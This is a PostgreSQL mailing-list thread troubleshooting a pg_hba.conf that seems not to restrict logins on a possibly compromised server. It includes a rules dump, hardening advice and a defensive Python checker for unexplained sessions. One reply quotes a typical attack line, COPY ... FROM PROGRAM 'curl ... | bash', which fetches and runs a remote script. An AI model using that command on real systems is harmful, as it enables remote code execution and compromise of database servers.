Discussion: Re: How to confirm the pg_hba.conf service is correctly working


Re: How to confirm the pg_hba.conf service is correctly working

From
shing dong
Date:
Your original post stated that you only had 
host   VJ   VJ_USER   10.10.10.1/32 md5 
in the pg_hba.conf file.
However, the result of the select is considerably more?


Dear

I have tested this feature; I only had

host   VJ   VJ_USER   10.10.10.1/32 md5

in the pg_hba.conf file.

I have checked select * from pg_hba_file_rules; the results are consistent with pg_hba.conf.

Any IP and user can still log in to the DB.

When I remove the pg software and reinstall it, the pg_hba function works, which indicates that the location and content of pg_hba.conf are correct.

I suspect that the pg_hba function is destroyed?

Dave Cramer <davecramer@postgres.rocks> wrote on Wed, 22 Dec 2021 at 6:58 PM:


On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:
Dear Dave,

The result after reload is

2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""

No other error message

------------------------------------------

Result of select * from pg_hba_file_rules:


line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,

Hmmm, for some reason I did not reply to the list.

At any rate. 

Your original post stated that you only had 

host   VJ   VJ_USER   10.10.10.1/32 md5 

in the pg_hba.conf file.

However, the result of the select is considerably more?


Dave Cramer

Re: How to confirm the pg_hba.conf service is correctly working

From
Imre Samu
Date:
> Have checked  select * from pg_hba_file_rules results are consistent with pg_hba.conf
> any ip and user still can login in db   

Any proxy? Port/IP forwarding running in the background?

Next time, check the "client_addr":
-  SELECT usename, client_addr FROM pg_stat_activity where client_addr is not null ; 


> a Postgres DB that was Hacked l
> When I remove pg  software and reinstall pg software

I agree with the others;
- please re-install the full system! (not just PostgreSQL!)

Usually, the attack sequence is:
 - open port, brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" to be installed and running hidden in the background.



> host   VJ   VJ_USER   10.10.10.1/32 md5

imho:
- use different ports
- change "md5" to "scram-sha-256"
- for administration use SSH tunnels: https://www.postgresql.org/docs/10/ssh-tunnels.html (and use a firewall to close all external ports, or use SSL)

 Regards,
   Imre


shing dong <s7eqs7eq@gmail.com> wrote (on Thu, 23 Dec 2021, 11:15):

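Imre's two checks above (what pg_hba_file_rules says, and who is actually connected according to client_addr) can be cross-checked mechanically. The following script is an added example, not code from the thread or from PostgreSQL: it replays pg_hba's first-match rule over a list of observed sessions and reports any session that no rule admits. If the server really enforced the rules you are looking at, that list must be empty; anything in it means the rules in force are not the ones you are reading (a different hba_file, or a local proxy/port-forward that makes every client look like 127.0.0.1 and so fall into the "host all all 127.0.0.1/32" line). The sample rules and sessions are constructed here; in practice you would feed in "\copy (select * from pg_hba_file_rules) to 'rules.csv' csv header" and the datname/usename/client_addr columns of pg_stat_activity. The matching is a simplification: hostssl/hostnossl are treated like host, and "+group", samehost/samenet and hostname entries are treated as non-matching.

```python
"""Replay pg_hba matching over observed sessions (added example, not from the thread)."""
import csv
import io
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a few rows in the CSV shape pg_hba_file_rules produced in the thread.
RULES_CSV = """\
line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
"""


@dataclass(frozen=True)
class Session:
    """One pg_stat_activity row, reduced to what pg_hba matching needs."""
    datname: str
    usename: str
    client_addr: Optional[str]   # None for Unix-socket connections
    replication: bool = False    # True for a physical replication (walsender) session


# Constructed sample of observed sessions.
SESSIONS = [
    Session("product", "product_member", "10.33.132.41"),  # admitted by line 99
    Session("product", "product_dba", "127.0.0.1"),        # admitted by line 86: via a local proxy
    Session("product", "querysysuser", "198.51.100.7"),    # no rule admits this one
]


def parse_rules(text):
    """pg_hba_file_rules exported as CSV -> list of dict rows, file order preserved."""
    return list(csv.DictReader(io.StringIO(text)))


def _names(field):
    """pg_hba_file_rules renders name lists as arrays: '{a,b}' -> ['a', 'b']."""
    return [n.strip() for n in field.strip("{}").split(",") if n.strip()]


def _db_matches(rule, s):
    for db in _names(rule["database"]):
        if s.replication:
            # A physical replication connection only matches the 'replication'
            # keyword, never 'all' or a database name.
            if db == "replication":
                return True
        elif db == "all" or db == s.datname:
            return True
    return False


def _user_matches(rule, s):
    # '+group' (role membership) is not resolved here and therefore never matches.
    return any(u == "all" or u == s.usename for u in _names(rule["user_name"]))


def _addr_matches(rule, s):
    if rule["type"] == "local":
        return s.client_addr is None
    if s.client_addr is None:
        return False  # host/hostssl/hostnossl never match a Unix-socket session
    addr, mask = rule["address"], rule["netmask"]
    if addr == "all":
        return True
    if not mask:  # samehost/samenet/hostname forms are not resolved by this checker
        return False
    try:
        net = ipaddress.ip_network(f"{addr}/{mask}", strict=False)
        return ipaddress.ip_address(s.client_addr) in net
    except ValueError:
        return False


def first_match(rules, s):
    """First rule in file order that matches the session, or None (pg_hba semantics)."""
    for rule in rules:
        if _addr_matches(rule, s) and _db_matches(rule, s) and _user_matches(rule, s):
            return rule
    return None


def match_line(rules, s):
    """line_number of the rule that decides this session, or None if nothing matches."""
    rule = first_match(rules, s)
    return int(rule["line_number"]) if rule else None


def unexplained_sessions(rules, sessions):
    """Sessions that no rule admits: no match at all, or the deciding rule is 'reject'."""
    out = []
    for s in sessions:
        rule = first_match(rules, s)
        if rule is None or rule["auth_method"] == "reject":
            out.append(s)
    return out


if __name__ == "__main__":
    rules = parse_rules(RULES_CSV)
    for s in SESSIONS:
        print(f"{s.usename}@{s.datname} from {s.client_addr} -> line {match_line(rules, s)}")
    print("unexplained:", unexplained_sessions(rules, SESSIONS))
```

The local-proxy case is the one worth noticing: a session from product_dba is "explained" by line 86 only because its client_addr is 127.0.0.1, which is exactly what a port forwarder on the database host would produce, so a non-empty client_addr list that is all loopback deserves the same suspicion as an unexplained session.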
Re: How to confirm the pg_hba.conf service is correctly working

From
Vijaykumar Jain
Date:

On Thu, 23 Dec 2021 at 15:45, shing dong <s7eqs7eq@gmail.com> wrote:
I have tested this feature; I only had

host   VJ   VJ_USER   10.10.10.1/32 md5

in the pg_hba.conf file  


I may be a bit off, but can you try a couple of things, other than a fresh install, in case you have time to debug more.

Is it possible to snapshot the VM and set it up in a controlled environment where you can play around with incoming connections at the network layer beyond the VM?
With that, is it possible for you to use gdb and debug a connection to the postmaster?
You can set it up using the below,

and then you can put a breakpoint at this function and check the input lines it gets for parsing.

But maybe this helps identify why other IPs are being allowed.
To be more paranoid, you can add a reject for the IP you are trying to make a connection from, and trace that specific rule.

This might be overkill and maybe a waste of effort given you can already query the hba view, but in case you want to try it out.